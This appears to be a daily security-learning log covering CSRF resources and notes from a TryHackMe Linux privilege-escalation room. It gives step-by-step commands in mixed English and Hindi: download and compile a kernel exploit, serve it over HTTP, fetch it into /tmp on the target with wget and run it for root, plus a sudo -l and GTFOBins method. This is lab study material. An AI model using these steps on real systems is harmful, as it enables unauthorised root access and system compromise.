🎯 Day 9 Task
✅ CSRF Video
https://www.youtube.com/watch?v=iyE9UsBF64w
✅ POC
https://www.youtube.com/watch?v=TGJ4I-F5LhE
https://www.youtube.com/watch?v=YPnejsLPfVk
https://www.youtube.com/watch?v=gBdiKqNPQS8
https://www.youtube.com/watch?v=5jHIUTEdpvI
✅ CSRF Writeup
https://huntr.dev/bounties/f952af13-8042-457d-b8d8-bd338987dc02/
✅ Tweet
https://twitter.com/rootxyash/status/1480126074994368512
https://twitter.com/mavericknerd/status/1214071332083658757
🔁 THM Room
➡ Working on Linux PrivEsc Room
✅ Completed till Task 6 Privilege Escalation Sudo
https://tryhackme.com/room/linprivesc
For more Info check out my Github Repo
https://github.com/Imran407704/Learn365/
Some Tips :
The Kernel exploit methodology is simple :
- Identify the kernel version
- Search and find an exploit code for the kernel version of the target system
- Run the exploit
Remember that: a failed kernel exploit can lead to a system crash :P
The Sudo exploit methodology :
- First check how many programs normal user run with sudo rights -: sudo -l
- go to https://gtfobins.github.io & search the binary file which have sudo rights
- Paste that Command & You are Root User :)
Some Keywords :
String | Meaning |
---|---|
Local system | My Computer |
EXPL_FILE | Name of that Particular Exploit (in my case the name of exploit is 37292) |
IP:PORT | VPN IP (If you are on tryhackme) / local system IP:jo port se http server bana tha |
- (hypen) | hypen ke baad command hai :) |
My Steps for Kernel Exploit :
- Exploit ko local system me - wget https://www.exploit-db.com/exploits/EXPL_FILE se download kiya
- gcc se complile kiya - gcc 37292.c exploit
- local system me http server banaya - sudo python3 -m http.server
- & Then target machine ke tmp (temp) directory me jaana hai bcoz yehi directory aisi hai jisme hamey write ki permission hai mai ne home directory me bhi check kiya but waha par exploit ko local machine se transfer nhi kar pa rha tha - wget http://IP:PORT/exploit (remember that http use karna hai not https )
- ./exploit ROOT User :)
My Steps for Sudo Exploit :
- First check how many programs normal user run with sudo rights - sudo -l
- go to https://gtfobins.github.io & search the binary file which have sudo rights
#bugbounty #privesc #infosec #learn365